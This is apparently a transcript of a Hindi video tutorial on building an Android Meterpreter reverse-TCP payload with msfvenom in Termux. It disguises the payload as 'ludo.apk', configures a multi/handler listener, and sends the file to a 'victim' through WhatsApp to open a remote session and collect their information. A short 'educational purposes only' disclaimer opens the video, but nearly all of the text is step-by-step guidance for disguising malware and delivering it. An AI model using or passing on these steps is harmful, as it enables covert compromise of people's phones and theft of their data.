आज की वीडियो में हम लोग इस टर्मक्स एप्लीकेशन के अंदर मेटास्प्लॉइट में पेलोड बनाना सीखेंगे। उससे पहले पेलोड बनाने से पहले मैं आपको एक वार्निंग देना चाहता हूँ। ये वार्निंग यह है कि आप लोग इसे एजुकेशन पर्पस के लिए ही इस्तेमाल करें। इस इंफॉर्मेशन को किसी भी तरीके की बदला लेने की या फिर किसी भी तरीके की क्राइम करने की कोशिश इससे ना करें। इससे मेरा चैनल और मैं जिम्मेदार नहीं होंगे। तो यहाँ पर आप देख सकते हैं हम लोग मेटास्प्लॉइट स्टार्ट कर चुके हैं और मेटास्प्लॉइट के अंदर हम लोग पेलोड जनरेट करने के लिए MSF वेनम का इस्तेमाल करेंगे। तो लिखेंगे MSF वेनम -p यानी कि पेलोड, फिर एंड्रॉयड -मेटरप्रेटर -रिवर्स /TCP। उसके बाद लिखना है आपको lhost डालना है। lhost जाने के लिए आपको एक नए सेशन में आ जाना है और यहाँ पर लिखना है ifconfig। तो आप देख सकते हैं यहाँ पर हमारा इनेट करके ये IP एड्रेस आपका आ चुका है। IP एड्रेस को आप इसमें डाल देंगे। IP एड्रेस को डालने के बाद आपको L पोर्ट डालना है। इसमें नंबर आप 7777 लिखेंगे, फिर -o लिख के फिर आप ऐप का नाम या फिर APK का नाम भी लिख सकते हैं। यहाँ पर मैंने मॉड लिखा है, मैं इसे चेंज करके लूडो कर देता हूँ। ये मैं आपको आगे बताऊँगा कि मैंने इसे लूडो क्यों किया है। फिर एंटर करेंगे तो ये हमारा पेलोड जनरेट होने लगेगा। पेलोड जनरेट होने में थोड़ा टाइम लग सकता है, वेट करेंगे थोड़ी देर। तो यहाँ पर आप देख सकते हैं हमारा पेलोड जनरेट हो चुका है और यहाँ पर आपको पेलोड का साइज़ दिखा रहा है 10,229 बाइट्स का और ये ludo.apk नाम से सेव हो चुका है। अब हमें इसे स्टार्ट करने के लिए यूज़ करना होगा मल्टी हैंडलर को। तो हम लिखेंगे यूज़ एक्सप्लॉइट /multi/हैंडलर। यहाँ पर थोड़ा स्पेलिंग मिस्टेक हुआ है। यूज़ एक्सप्लॉइट/मल्टी/हैंडलर। आप लोग याद रखिएगा, अगर थोड़ा सा भी स्पेलिंग मिस्टेक होता है तो आपकी कमांड नहीं रन करेगी। अब यहाँ पर मल्टी हैंडलर स्टार्ट हो चुका है। अब इसमें हम लोग अपने पेलोड को कनेक्ट करेंगे ताकि हम लोग अपने विक्टिम की इंफॉर्मेशंस यहाँ पर ले पाएँ। अब आप लोगों को अगली कमांड डालनी है सेट पेलोड एंड्रॉयड मेटरप्रेटर रिवर्स TCL, सॉरी ये TCP होगा। और इस कमांड को फिर हमें रन करना है। ये कमांड रन होते ही हमारा पेलोड हमारे मल्टी हैंडलर से जुड़ जाएगा। फिर हमें यहाँ पर लिखना है शो ऑप्शंस। इससे ये हमें ऑप्शंस दिखा देगा। अब आप देख सकते हैं यहाँ पर हमारा L पोर्ट तो डला ही हुआ है लेकिन हमारा lhost नहीं दिखाई दे रहा है। देखिए lhost को हम लोग डालेंगे। lhost डालेंगे हम लोग अपना lhost वहाँ से कॉपी कर लेते हैं।
कॉपी करके यहाँ पेस्ट कर देंगे और एंटर कर देंगे। यहाँ पर कुछ एरर दिखा रहा है। यहाँ पर आपको लिखना है सेट एल होस्ट, उसके बाद आपको अपना IP एड्रेस डाल के एंटर करना है तो एल होस्ट सेट हो जाएगा। फिर हम लोग एल पोर्ट भी सेट कर देते हैं। एल पोर्ट भी हम लोग 44 से हटा के 777 कर देते हैं जो हमने पहले ही डाला था। फिर इसे एंटर कर देंगे। अब होगा ये कि एक थोड़ी सी एरर आएगी आपको पेलोड ऑपरेट करने में, कि जब भी विक्टिम आपका पेलोड को खोलेगा, कि जब भी आपका विक्टिम पेलोड पे लाइव रहेगा तब तक आपका सेशन चलेगा, और आप जैसे ही वो पेलोड से बाहर निकलेगा आपका सेशन बंद हो जाएगा। इस चीज़ को बंद करने के लिए हम लोग लिखेंगे सेट एग्ज़िट ऑन सेशन फॉल्स। और मैं आपको बता देना चाहता हूँ ये तभी वर्क करेगा जब आप एग्ज़िट का ई, ओ ऑन का ओ और सेशन का एस कैपिटल लेटर में लिखेंगे। फिर उसे एंटर करेंगे तो एग्ज़िट ऑन सेशन बंद हो जाएगा। फिर हमें एक्सप्लॉइट को बैकग्राउंड में रन करने की परमिशन देनी होगी। उसके लिए हम लिखेंगे एक्सप्लॉइट -J और एंटर करेंगे। इसमें थोड़ा सा समय लग सकता है। तो हमारी सारी सेटिंग्स रेडी हैं। अब हमें हमारा सेशन ऑन करना है, जिस सेशन में हमें अपने विक्टिम की सारी इन्फॉर्मेशन दिखेगी। तो हम लिखेंगे यहाँ पर आपको सेशन -I करते ही आप देख सकते हैं एक्टिव सेशन, नो एक्टिव सेशन बता रहा है, यानी कि किसी ने भी अभी हमारा पेलोड ऑन नहीं किया है। और अभी आप लोग सोच रहे होंगे कि हम पेलोड को कैसे किसी के पास भेज सकते हैं। तो यार, पेलोड को किसी के पास भेजने के लिए आपको पहले नया सेशन ऑन करना होगा। एक नया सेशन बना लीजिए, न्यू सेशन, और इस पे आपको फिर से proot डिस्ट्रो करके लॉगिन उबंटू, यहाँ पर आपको उबंटू पे लॉगिन हो जाना है। फिर MSF कंसोल रन करना है। MSF कंसोल रन करने के बाद आपको यहाँ पर आपको ls टाइप करते ही ludo.apk नाम की मिल जाएगी फ़ाइल। इसी को हमें अपने इंटरनल स्टोरेज पे वो करना होगा, ट्रांसफ़र या फिर कॉपी कह सकते हैं आप। ये ध्यान रखिएगा कि आपको इसे सिर्फ कॉपी करना है। इसे अगर आपने टर्मक्स से मूव कर दिया, यानी कि MV टाइप करके किया, तो आपका टर्मक्स से कनेक्शन तुरंत टूट जाएगा। इसीलिए आपको इसे कॉपी करना है। तो हम लोग लिखेंगे CP, फिर इसे लूडो किंग को कॉपी कर देंगे यहाँ पर। उसके बाद अपने स्टोरेज का बेसिक कमांड डालना है, जिस स्टोरेज इंटरनल स्टोरेज का लोकेशन डालना है, जो कि यही होता है जो मैं डाल रहा हूँ, /storage/emulated/0/। ये करते ही आपका लूडो किंग आपके स्टोरेज एमुलेटेड में चला जाएगा। अब फिर आप ls करेंगे तो यहाँ पर आपको लूडो किंग दिखाएगा, क्योंकि हम लोगों ने कॉपी किया है। अब मैं आपको इंटरनल स्टोरेज में अपने दिखा देता हूँ। यहाँ पर आप देख सकते हैं लूडो APK नाम की ये आ चुका है। इसे आप व्हाट्सएप या फिर किसी भी मैसेजर सेंडर की मदद से विक्टिम के पास सेंड कर सकते हैं। और जैसे ही वो इस पेलोड को ऑन करेगा, उससे कुछ परमिशंस मांगेंगी, वो परमिशंस भी उसे अलाउ करना होगा। वो परमिशंस अलाउ करते ही आपका यहाँ पर सेशन ऑन हो जाएगा। मैं आपको दिखा देता हूँ, यहाँ पर आपका सेशन ऑन हो जाएगा और उस सेशन में आप फिर लिखेंगे हेल्प। तो आपको यहाँ पर क्या क्या चीज़ें आप
कर सकते हैं। सेशन ऑन हो जाने के बाद वो दिखा देगा, तो आप इन सब चीज़ों को कर सकते हैं, जैसे एनालाइज, सर्ट, डीबी कनेक्ट, डीबी डिस्कनेक्ट, डीबी एक्सपोर्ट, डीबी इंपोर्ट, डीबी एनमैप। आप सेव कर सकते हैं, किसी भी चीज़ को रिमूव कर सकते हैं और होस्ट कर सकते हैं, लूट कर सकते हैं, नोट कर सकते हैं, सर्विसेज प्रोवाइड कर सकते हैं, वर्ल्स कर सकते हैं, वर्क स्पेस क्रिएट कर सकते हैं। यही सब आप कमांड आप रन कर पाएंगे। और आज के लिए बस इतना ही। थैंक यू।